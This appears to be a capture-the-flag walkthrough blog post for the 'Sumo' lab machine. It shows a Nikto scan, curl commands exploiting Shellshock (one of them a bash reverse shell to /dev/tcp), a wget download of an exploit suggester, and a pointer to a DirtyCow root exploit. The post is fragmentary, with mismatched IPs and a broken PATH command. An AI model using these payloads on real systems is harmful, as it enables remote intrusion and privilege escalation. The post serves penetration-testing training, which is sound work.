pg-sumo-play

Exploitation Guide for Sumo
SummaryThis machine is exploited by the ShellShock vulnerability. It is escalated via the DirtyCow local root exploit.Enumeration
kali@kali:~/sumo$ nikto -h http://192.168.54.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.87
+ Target Hostname: 192.168.54.87
+ Target Port: 80
+ Start Time: 2021-09-20 15:23:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2021-09-20 15:23:09 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/sumo$ 

Two ports open so we're going to hit the web port with Nikto:

Keeping things simple, let’s just see if this is really vulnerable:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.86.150/cgi-bin/test/test.cgi


Excellent!  We execute ID and we get a response.  Now let’s see if we can get a shell:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.86.99/443 0>&1' http://192.168.86.150/cgi-bin/test/test.cgi


With our handler setup:


Excellent!  We catch our shell and we clean up the environment.  Now let’s see what we’re dealing with:

gcc error ,We can fix that error with the following:

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Let’s also try :

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

www-data@ubuntu:/tmp$ wget http://192.168.49.54/linux-exploit-suggester.sh
wget http://192.168.49.54/linux-exploit-suggester.sh
--2021-09-21 02:32:30-- http://192.168.49.54/linux-exploit-suggester.sh
Connecting to 192.168.49.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'

0K .......... .......... .......... .......... .......... 57% 227K 0s
50K .......... .......... .......... ...... 100% 2.58M=0.2s

2021-09-21 02:32:31 (371 KB/s) - `linux-exploit-suggester.sh' saved [88891/88891]

www-data@ubuntu:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
48 user space exploits

Possible Exploits:

cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Download URL: https://www.exploit-db.com/download/26131
Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: highly probable
Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
Download URL: https://cyseclabs.com/exploits/vnik_v1.c
Comments: No SMEP/SMAP bypass

--snip--

[+] [CVE-2012-0809] death_star (sudo)

Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
Exposure: less probable
Tags: fedora=16
Download URL: https://www.exploit-db.com/download/18436

www-data@ubuntu:/tmp$

 

and yes we use dirty

https://github.com/FireFart/dirtycow/blob/master/dirty.c

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *